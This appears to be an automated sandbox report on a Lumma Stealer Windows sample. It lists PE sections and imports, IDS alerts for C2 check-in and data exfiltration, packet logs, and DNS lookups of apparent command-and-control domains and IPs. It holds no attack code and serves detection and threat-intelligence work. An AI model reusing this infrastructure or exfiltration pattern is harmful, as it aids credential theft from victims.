.text | 0x1000 | 0x326cc | 0x32800 | ccc71f71555262d04b28eeb13f33c694 | False | 0.5078125 | data | 6.449171689149143 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x34000 | 0xad9c | 0xae00 | 265ca2e098c45dacae5fa86d5b3aa7cb | False | 0.4167789152298851 | locale data table | 4.866718139159974 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3f000 | 0x3618 | 0x2600 | 34a18fbac611bd450c331e8e8b0fc570 | False | 0.31270559210526316 | data | 5.125689677633356 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x43000 | 0x9 | 0x200 | 1f354d76203061bfdd5a53dae48d5435 | False | 0.033203125 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x44000 | 0x2324 | 0x2400 | a5356144ed5fdf31d774488bfaa21264 | False | 0.7392578125 | data | 6.496424389763303 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss | 0x47000 | 0x49600 | 0x49600 | e87986d7cde0072f41d6ecee3edb590f | False | 1.000336057282794 | OpenPGP Secret Key | 7.999431134473286 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x91000 | 0x3e8 | 0x400 | 64acc37535b725263869df252fd47b49 | False | 0.43359375 | data | 3.281274144562883 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x91058 | 0x390 | data | English | United States | 0.4517543859649123
DLL | Import
KERNEL32.dll | AcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
USER32.dll | DefWindowProcW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T00:48:02.275654+0100 | 2058212 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click) | 1 | 192.168.2.4 | 54073 | 1.1.1.1 | 53 | UDP
2024-12-23T00:48:34.217069+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 193.143.1.9 | 443 | TCP
2024-12-23T00:49:06.217277+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 193.143.1.9 | 443 | TCP
2024-12-23T00:49:09.290585+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49760 | 23.55.153.106 | 443 | TCP
2024-12-23T00:49:10.056462+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.4 | 49760 | 23.55.153.106 | 443 | TCP
2024-12-23T00:49:11.733313+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49765 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:12.482826+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49765 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:12.482826+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49765 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:13.815665+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49771 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:14.582391+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49771 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:14.582391+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49771 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:16.153911+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49777 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:17.087529+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49777 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:18.401160+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49784 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:20.953353+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49793 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:23.663286+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49800 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:26.284170+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49806 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:30.201674+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49817 | 104.21.66.86 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.582686901 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.582797050 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.582839966 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.582848072 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.582968950 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.583014965 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.583020926 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.596352100 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.596419096 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.596426010 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.610574961 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.610651016 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.610656977 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.654572010 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.702038050 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.748326063 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.748383045 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.778318882 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.778410912 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.778433084 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.778455973 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.778570890 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.778585911 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.778652906 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.778757095 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.778986931 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.779005051 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.779016018 CET49771443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.779022932 CET44349771104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.933125973 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.933223963 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.933383942 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.933653116 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:14.933687925 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.153753042 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.153911114 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.155582905 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.155615091 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.156301975 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.157481909 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.157655001 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.157742023 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.157820940 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:16.157835960 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.087660074 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.087891102 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.087970018 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.088052034 CET49777443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.088088989 CET44349777104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.179697990 CET49784443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.179744959 CET44349784104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.179824114 CET49784443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.180084944 CET49784443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:17.180113077 CET44349784104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:18.401031017 CET44349784104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:18.401160002 CET49784443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:18.404786110 CET49784443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:18.404820919 CET44349784104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:18.405239105 CET44349784104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:18.406471968 CET49784443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:18.406805992 CET49784443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:18.406852007 CET44349784104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.492739916 CET44349784104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.492990017 CET44349784104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.493052959 CET49784443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.493119955 CET49784443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.493139029 CET44349784104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.732254982 CET49793443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.732289076 CET44349793104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.732369900 CET49793443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.732749939 CET49793443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:19.732764959 CET44349793104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.953237057 CET44349793104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.953352928 CET49793443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.954494953 CET49793443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.954504967 CET44349793104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.955197096 CET44349793104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.958548069 CET49793443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.958652020 CET49793443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.958690882 CET44349793104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.958781004 CET49793443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:20.958791018 CET44349793104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:21.911938906 CET44349793104.21.66.86192.168.2.4
Dec 23, 2024 00:49:21.912178040 CET | 443 | 49793 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:21.912237883 CET | 49793 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:21.913855076 CET | 49793 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:21.913866043 CET | 443 | 49793 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:22.443367004 CET | 49800 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:22.443398952 CET | 443 | 49800 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:22.443731070 CET | 49800 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:22.444041014 CET | 49800 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:22.444055080 CET | 443 | 49800 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:23.663167000 CET | 443 | 49800 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:23.663285971 CET | 49800 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:23.666248083 CET | 49800 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:23.666256905 CET | 443 | 49800 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:23.666678905 CET | 443 | 49800 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:23.669106960 CET | 49800 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:23.669178009 CET | 49800 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:23.669183969 CET | 443 | 49800 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:24.465372086 CET | 443 | 49800 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:24.465621948 CET | 443 | 49800 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:24.465711117 CET | 49800 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:24.466039896 CET | 49800 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:24.466058969 CET | 443 | 49800 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:25.062551975 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:25.062587976 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:25.062666893 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:25.063044071 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:25.063061953 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:26.284091949 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:26.284169912 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.285254955 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.285264969 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:26.285743952 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:26.286955118 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.287750006 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.287791014 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:26.287894011 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.287929058 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:26.288041115 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.288095951 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:26.288224936 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.288249016 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:26.288392067 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.288412094 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:26.288568974 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.288599014 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:26.288608074 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.288739920 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.288770914 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.335336924 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:26.335515976 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.335567951 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.335583925 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.379370928 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:26.379576921 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.379612923 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.379640102 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.423378944 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:26.423628092 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:26.467329979 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:26.648612022 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:29.096524954 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:29.096781969 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:29.096847057 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:29.097001076 CET | 49806 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:29.097011089 CET | 443 | 49806 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:29.131506920 CET | 49817 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:29.131582975 CET | 443 | 49817 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:29.131674051 CET | 49817 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:29.131975889 CET | 49817 | 443 | 192.168.2.4 | 104.21.66.86
Dec 23, 2024 00:49:29.132008076 CET | 443 | 49817 | 104.21.66.86 | 192.168.2.4
Dec 23, 2024 00:49:30.201673985 CET | 49817 | 443 | 192.168.2.4 | 104.21.66.86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 00:48:02.275654078 CET | 54073 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 00:48:02.496366024 CET | 53 | 54073 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 00:48:02.500402927 CET | 53626 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 00:48:02.728920937 CET | 53 | 53626 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 00:48:34.220897913 CET | 51837 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 00:48:34.442045927 CET | 53 | 51837 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 00:49:06.218733072 CET | 56456 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 00:49:06.436134100 CET | 53 | 56456 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 00:49:06.438205957 CET | 54259 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 00:49:06.676548958 CET | 53 | 54259 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 00:49:06.680617094 CET | 52144 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 00:49:06.899812937 CET | 53 | 52144 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 00:49:06.901473999 CET | 65317 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 00:49:07.207168102 CET | 53 | 65317 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 00:49:07.209728003 CET | 60644 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 00:49:07.518980980 CET | 53 | 60644 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 00:49:07.522612095 CET | 54400 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 00:49:07.746644020 CET | 53 | 54400 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 00:49:07.748267889 CET | 50760 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 00:49:07.885488987 CET | 53 | 50760 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 00:49:10.270246983 CET | 57079 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 00:49:10.504798889 CET | 53 | 57079 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 00:48:02.275654078 CET | 192.168.2.4 | 1.1.1.1 | 0x9665 | Standard query (0) | bellflamre.click | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:48:02.500402927 CET | 192.168.2.4 | 1.1.1.1 | 0x8ad | Standard query (0) | sendypaster.xyz | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:48:34.220897913 CET | 192.168.2.4 | 1.1.1.1 | 0x32de | Standard query (0) | steppriflej.xyz | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:49:06.218733072 CET | 192.168.2.4 | 1.1.1.1 | 0x4c15 | Standard query (0) | greywe-snotty.cyou | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:49:06.438205957 CET | 192.168.2.4 | 1.1.1.1 | 0x9c09 | Standard query (0) | supporse-comment.cyou | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:49:06.680617094 CET | 192.168.2.4 | 1.1.1.1 | 0x4f42 | Standard query (0) | smash-boiling.cyou | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:49:06.901473999 CET | 192.168.2.4 | 1.1.1.1 | 0xf80e | Standard query (0) | ripe-blade.cyou | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:49:07.209728003 CET | 192.168.2.4 | 1.1.1.1 | 0xc21c | Standard query (0) | hosue-billowy.cyou | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:49:07.522612095 CET | 192.168.2.4 | 1.1.1.1 | 0x687a | Standard query (0) | pollution-raker.cyou | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:49:07.748267889 CET | 192.168.2.4 | 1.1.1.1 | 0x2e7d | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:49:10.270246983 CET | 192.168.2.4 | 1.1.1.1 | 0x6bf7 | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 00:48:02.496366024 CET | 1.1.1.1 | 192.168.2.4 | 0x9665 | Name error (3) | bellflamre.click | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:48:02.728920937 CET | 1.1.1.1 | 192.168.2.4 | 0x8ad | No error (0) | sendypaster.xyz |  | 193.143.1.9 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:48:34.442045927 CET | 1.1.1.1 | 192.168.2.4 | 0x32de | No error (0) | steppriflej.xyz |  | 193.143.1.9 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:49:06.436134100 CET | 1.1.1.1 | 192.168.2.4 | 0x4c15 | Name error (3) | greywe-snotty.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:49:06.676548958 CET | 1.1.1.1 | 192.168.2.4 | 0x9c09 | Name error (3) | supporse-comment.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:49:06.899812937 CET | 1.1.1.1 | 192.168.2.4 | 0x4f42 | Name error (3) | smash-boiling.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:49:07.207168102 CET | 1.1.1.1 | 192.168.2.4 | 0xf80e | Name error (3) | ripe-blade.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 00:49:07.518980980 CET | 1.1.1.1 | 192.168.2.4 | 0xc21c | Name error (3) | hosue-billowy.cyou | none | none | A (IP address) | IN (0x0001) | false
